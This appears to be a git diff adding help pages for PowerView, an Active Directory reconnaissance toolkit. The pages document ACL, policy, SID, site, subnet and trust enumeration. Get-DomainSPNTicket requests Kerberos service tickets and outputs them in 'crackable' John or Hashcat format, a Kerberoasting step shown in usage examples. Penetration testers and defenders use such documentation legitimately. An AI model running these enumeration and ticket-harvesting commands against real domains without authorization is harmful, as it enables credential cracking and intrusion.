+``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ADObject + +Custom PSObject with translated AD object property fields. + +PowerView.ADObject.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainObjectAcl.md b/docs/Recon/Get-DomainObjectAcl.md new file mode 100755 index 0000000..97f70cd --- /dev/null +++ b/docs/Recon/Get-DomainObjectAcl.md 
@@ -0,0 +1,251 @@ +# Get-DomainObjectAcl + +## SYNOPSIS +Returns the ACLs associated with a specific active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap + +## SYNTAX + +``` +Get-DomainObjectAcl [[-Identity] ] [-ResolveGUIDs] [-RightsFilter ] [-Domain ] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs +``` + +Get the ACLs for the matt.admin user in the testlab.local domain and +resolve relevant GUIDs to their display names. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs +``` + +Enumerate the ACL permissions for all OUs in the domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ResolveGUIDs +Switch. +Resolve GUIDs to their display names. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RightsFilter +A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Rights + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ACL + +Custom PSObject with ACL entries. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainPolicy.md b/docs/Recon/Get-DomainPolicy.md new file mode 100755 index 0000000..8b7d157 --- /dev/null +++ b/docs/Recon/Get-DomainPolicy.md 
@@ -0,0 +1,159 @@ +# Get-DomainPolicy + +## SYNOPSIS +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID + +## SYNTAX + +``` +Get-DomainPolicy [[-Domain] ] [-Source ] [-Server ] [-ServerTimeLimit ] + [-ResolveSids] [-Credential ] +``` + +## DESCRIPTION +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller using Get-DomainGPO. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainPolicy +``` + +Returns the domain policy for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainPolicy -Domain dev.testlab.local +``` + +Returns the domain policy for the dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainPolicy -Source DC -Domain dev.testlab.local +``` + +Returns the policy for the dev.testlab.local domain controller. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainPolicy -Credential $Cred + +## PARAMETERS + +### -Domain +The domain to query for default policies, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Source +Extract 'Domain' or 'DC' (domain controller) policies. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Domain +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResolveSids +Switch. +Resolve Sids from a DC policy to object names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### Hashtable + +Ouputs a hashtable representing the parsed GptTmpl.inf file. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSID.md b/docs/Recon/Get-DomainSID.md new file mode 100755 index 0000000..16c51ce --- /dev/null +++ b/docs/Recon/Get-DomainSID.md 
@@ -0,0 +1,102 @@ +# Get-DomainSID + +## SYNOPSIS +Returns the SID for the current domain or the specified domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer + +## SYNTAX + +``` +Get-DomainSID [[-Domain] ] [[-Server] ] [[-Credential] ] +``` + +## DESCRIPTION +Returns the SID for the current domain or the specified domain by executing +Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192) +to search for domain controllers through LDAP. +The SID of the returned domain controller +is then extracted. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSID +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainSID -Domain testlab.local +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSID -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### String + +A string representing the specified domain SID. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSPNTicket.md b/docs/Recon/Get-DomainSPNTicket.md new file mode 100755 index 0000000..70385a4 --- /dev/null +++ b/docs/Recon/Get-DomainSPNTicket.md 
@@ -0,0 +1,136 @@ +# Get-DomainSPNTicket + +## SYNOPSIS +Request the kerberos ticket for a specified service principal name (SPN). + +Author: machosec, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +### RawSPN (Default) +``` +Get-DomainSPNTicket [-SPN] [-OutputFormat ] [-Credential ] +``` + +### User +``` +Get-DomainSPNTicket [-User] [-OutputFormat ] [-Credential ] +``` + +## DESCRIPTION +This function will either take one/more SPN strings, or one/more PowerView.User objects +(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN +using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. +The encrypted +portion of the ticket is then extracted and output in either crackable John or Hashcat +format (deafult of John). + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSPNTicket -SPN "HTTP/web.testlab.local" +``` + +Request a kerberos service ticket for the specified SPN. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket +``` + +Request kerberos service tickets for all SPNs passed on the pipeline. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat +``` + +Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format. + +## PARAMETERS + +### -SPN +Specifies the service principal name to request the ticket for. + +```yaml +Type: String[] +Parameter Sets: RawSPN +Aliases: ServicePrincipalName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -User +Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for. 
+ +```yaml +Type: Object[] +Parameter Sets: User +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -OutputFormat +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'John'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Format + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote domain using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more SPN strings on the pipeline with the RawSPN parameter set. + +### PowerView.User + +Accepts one or more PowerView.User objects on the pipeline with the User parameter set. + +## OUTPUTS + +### PowerView.SPNTicket + +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSite.md b/docs/Recon/Get-DomainSite.md new file mode 100755 index 0000000..caf7790 --- /dev/null +++ b/docs/Recon/Get-DomainSite.md 
@@ -0,0 +1,309 @@ +# Get-DomainSite + +## SYNOPSIS +Search for all sites or specific site objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainSite [[-Identity] ] [-GPLink ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties whencreated,usnchanged,...". +By default, all site objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSite +``` + +Returns the current sites in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainSite *admin* -Domain testlab.local +``` + +Returns all sites with "admin" in their name in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" +``` + +Returns all sites with linked to the specified group policy object. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSite -Credential $Cred + +## PARAMETERS + +### -Identity +An site name (e.g. +Test-Site), DistinguishedName (e.g. +CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or +GUID (e.g. +c37726ef-2b64-4524-b85b-6a9700c234dd). +Wildcards accepted. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -GPLink +Only return sites with the specified GUID in their gplink property. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: GUID + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Site + +Custom PSObject with translated site property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainSubnet.md b/docs/Recon/Get-DomainSubnet.md new file mode 100755 index 0000000..8cd82b1 --- /dev/null +++ b/docs/Recon/Get-DomainSubnet.md 
@@ -0,0 +1,309 @@ +# Get-DomainSubnet + +## SYNOPSIS +Search for all subnets or specific subnets objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainSubnet [[-Identity] ] [-SiteName ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties whencreated,usnchanged,...". +By default, all subnet objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainSubnet +``` + +Returns the current subnets in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainSubnet *admin* -Domain testlab.local +``` + +Returns all subnets with "admin" in their name in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" +``` + +Returns all subnets with linked to the specified group policy object. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSubnet -Credential $Cred + +## PARAMETERS + +### -Identity +An subnet name (e.g. +'192.168.50.0/24'), DistinguishedName (e.g. +'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'), +or GUID (e.g. +c37726ef-2b64-4524-b85b-6a9700c234dd). +Wildcards accepted. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SiteName +Only return subnets from the specified SiteName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Subnet + +Custom PSObject with translated subnet property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainTrust.md b/docs/Recon/Get-DomainTrust.md new file mode 100755 index 0000000..29af577 --- /dev/null +++ b/docs/Recon/Get-DomainTrust.md 
@@ -0,0 +1,250 @@ +# Get-DomainTrust + +## SYNOPSIS +{{Fill in the Synopsis}} + +## SYNTAX + +### NET (Default) +``` +Get-DomainTrust [[-Domain] ] [-FindOne] +``` + +### API +``` +Get-DomainTrust [[-Domain] ] [-API] [-Server ] [-FindOne] +``` + +### LDAP +``` +Get-DomainTrust [[-Domain] ] [-LDAP] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-FindOne] [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### Example 1 +``` +PS C:\> {{ Add example code here }} +``` + +{{ Add example description here }} + +## PARAMETERS + +### -API +{{Fill API Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: API +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +{{Fill Credential Description}} + +```yaml +Type: PSCredential +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +{{Fill Domain Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 0 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -FindOne +{{Fill FindOne Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAP +{{Fill LDAP Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +{{Fill LDAPFilter Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: Filter + +Required: False +Position: Named 
+Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +{{Fill Properties Description}} + +```yaml +Type: String[] +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +{{Fill ResultPageSize Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +{{Fill SearchScope Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: +Accepted values: Base, OneLevel, Subtree + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +{{Fill Server Description}} + +```yaml +Type: String +Parameter Sets: API, LDAP +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +{{Fill ServerTimeLimit Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +{{Fill Tombstone Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + 